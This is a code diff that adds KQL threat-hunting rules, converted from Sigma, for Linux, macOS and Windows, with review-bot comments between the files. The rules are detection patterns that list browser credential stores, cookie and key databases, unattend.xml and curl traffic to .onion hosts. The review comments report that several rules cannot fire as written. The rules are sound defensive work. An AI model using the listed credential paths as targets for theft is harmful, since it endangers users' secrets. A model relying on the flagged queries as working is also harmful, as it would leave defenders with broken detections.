+| where FolderPath endswith "\\curl.exe" and ProcessCommandLine contains ".onion" and (ProcessCommandLine contains "socks5h://" or ProcessCommandLine contains "socks5://" or ProcessCommandLine contains "socks4a://")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql
new file mode 100644
index 00000000..33bcdce3
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Long Filename Pattern - Linux
+// Author: @kostastsale
+// Date: 2025-11-22
+// Level: low
+// Description: Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell.
+// This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting.
+// Adjust the threshold of filename length as needed based on your environment.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027, detection.threat-hunting
+// False Positives:
+// - Legitimate files with long filenames.
+
+DeviceFileEvents
+| where FolderPath matches regex "[^/]{100,}$" and (not((FolderPath startswith "/run/systemd/units/invocation:systemd-fsck@" or FolderPath startswith "/sys/firmware/" or FolderPath startswith "/var/log/journal/")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql
new file mode 100644
index 00000000..f30726ea
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql
@@ -0,0 +1,14 @@
+// Title: Python Path Configuration File Creation - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql b/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql
new file mode 100644
index 00000000..c8ef2920
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql
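Review bot: The regex only accepts a versioned `/lib/python3.X/site-packages/` directory, so a `.pth` file written to Debian/Ubuntu's system location `/usr/lib/python3/dist-packages/` (unversioned directory, `dist-packages` name), which the interpreter on those distributions also processes at startup, is not covered. If Debian-based hosts are in scope, widen the pattern to `FolderPath matches regex "(?i)/lib/python3(\\.([5-9]|[0-9]{2}))?/(site|dist)-packages/"` and mention the added path in the header's "Default paths" line. The macOS variant of this rule later in the commit uses the same pattern; the gap matters less there but the two should stay in sync if this one is changed.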
@@ -0,0 +1,13 @@
+// Title: Process Discovery
+// Author: Ömer Günal, oscd.community, CheraaghiMilad
+// Date: 2020-10-06
+// Level: low
+// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
+// Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/atop" or FolderPath endswith "/htop" or FolderPath endswith "/pgrep" or FolderPath endswith "/ps" or FolderPath endswith "/pstree" or FolderPath endswith "/top"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql
new file mode 100644
index 00000000..d37fc7ef
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql
@@ -0,0 +1,10 @@
+// Title: Terminate Linux Process Via Kill
+// Author: Tuan Le (NCSGroup)
+// Date: 2023-03-16
+// Level: medium
+// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting
+
+DeviceProcessEvents
+| where FolderPath endswith "/kill" or FolderPath endswith "/killall" or FolderPath endswith "/pkill" or FolderPath endswith "/xkill"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql
new file mode 100644
index 00000000..f843fd86
--- /dev/null
+++ b/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql
@@ -0,0 +1,14 @@
+// Title: Python Path Configuration File Creation - MacOS
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql
new file mode 100644
index 00000000..0f8ca697
--- /dev/null
+++ b/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql
@@ -0,0 +1,16 @@
+// Title: Clipboard Data Collection Via Pbpaste
+// Author: Daniel Cortez
+// Date: 2024-07-30
+// Level: medium
+// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
+// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
+// It can also be used in shell scripts that may require clipboard content as input.
+// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
+// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/pbpaste"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..1c745702
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql
@@ -0,0 +1,17 @@
+// Title: Access To Browser Credential Files By Uncommon Applications
+// Author: frack113, X__Junior (Nextron Systems)
+// Date: 2022-04-09
+// Level: low
+// Description: Detects file access requests to browser credential stores by uncommon processes.
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where ((FileName contains "\\User Data\\Default\\Login Data" or FileName contains "\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "\\places.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
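Review bot: In the `DeviceFileEvents` schema `FileName` holds only the leaf file name while the full path is in `FolderPath`, so predicates such as `FileName contains "\\User Data\\Default\\Login Data"` or `FileName endswith "\\cookies.sqlite"` can never be satisfied and this rule will not fire; the Sigma `FileName` field of these file_access rules should be mapped to `FolderPath`, as the file-creation rules earlier in this commit already are. The same mapping defect is in the Chromium sensitive-files, `.reg`/`.hive`, Sysvol policies (where `FileName startswith "\\"` is likewise unsatisfiable) and Outlook mail rules that follow. Separately, `DeviceFileEvents` does not record read access, so even after the field fix these rules only observe an uncommon process writing, renaming or deleting the credential stores rather than reading them; that limitation belongs in the header comment, since the Sigma source describes access attempts.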
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..2ae80180
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
@@ -0,0 +1,16 @@
+// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: low
+// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes.
+// Could indicate potential attempt of stealing sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where (FileName contains "\\User Data\\Default\\Cookies" or FileName contains "\\User Data\\Default\\History" or FileName contains "\\User Data\\Default\\Network\\Cookies" or FileName contains "\\User Data\\Default\\Web Data") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..4def8a05
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql
@@ -0,0 +1,12 @@
+// Title: Access To .Reg/.Hive Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-09-15
+// Level: low
+// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.
+
+DeviceFileEvents
+| where (FileName endswith ".hive" or FileName endswith ".reg") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql
new file mode 100644
index 00000000..bf68304c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: Access To Sysvol Policies Share By Uncommon Process
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting
+
+DeviceFileEvents
+| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and FileName startswith "\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..3987d66e
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
@@ -0,0 +1,17 @@ +// Title: Access To Windows Outlook Mail Files By Uncommon Applications +// Author: frack113 +// Date: 2024-05-10 +// Level: low +// Description: Detects file access requests to Windows Outlook Mail by uncommon processes. +// Could indicate potential attempt of credential stealing. +// Requires heavy baselining before usage +// MITRE Tactic: Defense Evasion +// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents +| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql new file mode 100644 index 00000000..a83b7774 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql 
@@ -0,0 +1,11 @@
+// Title: Unattend.XML File Access Attempt
+// Author: frack113
+// Date: 2024-07-22
+// Level: low
+// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored.
+// This file is used during the unattended windows install process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceFileEvents
+| where FileName endswith "\\Panther\\unattend.xml"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql
new file mode 100644
index 00000000..1b7df97c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql
@@ -0,0 +1,12 @@
+// Title: ADS Zone.Identifier Deleted
+// Author: frack113
+// Date: 2023-09-04
+// Level: low
+// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceFileEvents
+| where FolderPath endswith ":Zone.Identifier"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql
new file mode 100644
index 00000000..be6f72c5
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql
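Review bot: The ADS rule is converted from a file_delete category but the query carries no ActionType filter, so it fires on every DeviceFileEvents record whose FolderPath ends with `:Zone.Identifier`, including the stream being written by a download, which is the opposite of what the title states; the converter should emit `| where ActionType == "FileDeleted"` for file_delete rules. The same gap applies to every file_event (creation) rule in this batch — creation of an executable, DMP/HDMP, PFX, .pth, scheduled task, code_tunnel.json, WDAC policy and WebDAV temp files — which would need `ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileRenamed")` if renames into the location should count) to match the Sigma category. Whether Defender records deletion of an alternate data stream as its own event with the stream name in FolderPath is worth confirming in the tenant before relying on this rule.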
@@ -0,0 +1,14 @@ +// Title: Creation of an Executable by an Executable +// Author: frack113 +// Date: 2022-03-09 +// Level: low +// Description: Detects the creation of an executable by another executable. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting +// False Positives: +// - Software installers +// - Update utilities +// - 32bit applications launching their 64bit versions + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith ".exe" and FolderPath endswith ".exe") and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") or (InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework" and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly") or (InitiatingProcessFolderPath endswith ":\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\cleanmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\dxgiadaptercache.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\Dism.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wuauclt.exe") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\GitHubDesktop\\Update.exe" and FolderPath contains "\\AppData\\Local\\SquirrelTemp\\") or ((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly\\NativeImages_") or 
((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\") or (FolderPath contains ":\\Program Files\\" or FolderPath contains ":\\Program Files (x86)\\")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and (FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe" and FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\") or (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\svchost.exe" and (FolderPath contains ":\\WUDownloadCache\\" and FolderPath contains "\\WindowsUpdateBox.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" and InitiatingProcessFolderPath endswith "\\Microsoft VS Code\\Code.exe" and FolderPath contains "\\.vscode\\extensions\\") or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or (InitiatingProcessFolderPath contains ":\\WINDOWS\\TEMP\\" or FolderPath contains ":\\WINDOWS\\TEMP\\") or (InitiatingProcessFolderPath contains ":\\WINDOWS\\SoftwareDistribution\\Download\\" and InitiatingProcessFolderPath endswith "\\WindowsUpdateBox.Exe" and FolderPath contains ":\\$WINDOWS.~BT\\Sources\\")))) and (not(((InitiatingProcessFolderPath endswith "\\ChromeSetup.exe" and FolderPath contains "\\Google") or (InitiatingProcessFolderPath contains "\\Python27\\python.exe" and (FolderPath contains "\\Python27\\Lib\\site-packages\\" or FolderPath contains "\\Python27\\Scripts\\" or FolderPath contains 
"\\AppData\\Local\\Temp\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\SquirrelTemp\\Update.exe" and FolderPath contains "\\AppData\\Local")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql new file mode 100644 index 00000000..9ac92f18 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql @@ -0,0 +1,12 @@ +// Title: DMP/HDMP File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-07 +// Level: low +// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Likely during crashes of software + +DeviceFileEvents +| where FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql new file mode 100644 index 00000000..8e57d44c --- /dev/null +++ b/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql 
@@ -0,0 +1,23 @@ +// Title: PFX File Creation +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: low +// Description: Detects the creation of PFX files (Personal Information Exchange format). +// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to: +// - Exfiltrate digital certificates for impersonation or signing malicious code +// - Establish persistent access through certificate-based authentication +// - Bypass security controls that rely on certificate validation +// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting +// False Positives: +// - System administrators legitimately managing certificates and PKI infrastructure +// - Development environments where developers create test certificates for application signing +// - Automated certificate deployment tools and scripts used in enterprise environments +// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients) +// - Certificate backup and recovery operations performed by IT staff +// - Build systems and CI/CD pipelines that generate code signing certificates +// - Third-party applications that create temporary certificates for secure communications + +DeviceFileEvents +| where FolderPath endswith ".pfx" and (not((FolderPath startswith "C:\\Program Files\\CMake\\" or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe")) and FolderPath endswith "\\OneDrive\\CodeSigning.pfx") or (FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or 
FolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql new file mode 100644 index 00000000..357653c8 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql @@ -0,0 +1,14 @@ +// Title: Python Path Configuration File Creation - Windows +// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents +| where (FolderPath endswith ".pth" and FolderPath matches regex "(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\") and (not((InitiatingProcessFolderPath endswith "\\python.exe" and (FolderPath endswith "\\pywin32.pth" or FolderPath endswith "\\distutils-precedence.pth")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql new file mode 100644 index 00000000..6d47da3f --- /dev/null 
+++ b/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Created - FileCreation
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via file creation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting
+// False Positives:
+// - Normal behaviour on Windows
+
+DeviceFileEvents
+| where FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\SysWOW64\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql
new file mode 100644
index 00000000..8765c14f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql
@@ -0,0 +1,12 @@
+// Title: VsCode Code Tunnel Execution File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.threat-hunting
+// False Positives:
+// - Legitimate usage of VsCode tunneling functionality will also trigger this
+
+DeviceFileEvents
+| where FolderPath endswith "\\code_tunnel.json"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql
new file mode 100644
index 00000000..84723fd6
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql
@@ -0,0 +1,12 @@
+// Title: WDAC Policy File Creation In CodeIntegrity Folder
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-01-30
+// Level: medium
+// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting
+// False Positives:
+// - May occur legitimately as part of admin activity, but rarely with interactive elevation.
+
+DeviceFileEvents
+| where InitiatingProcessIntegrityLevel =~ "High" and FolderPath contains ":\\Windows\\System32\\CodeIntegrity\\" and (FolderPath endswith ".cip" or FolderPath endswith ".p7b")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql
new file mode 100644
index 00000000..d50ad721
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: WebDAV Temporary Local File Creation
+// Author: Micah Babinski
+// Date: 2023-08-21
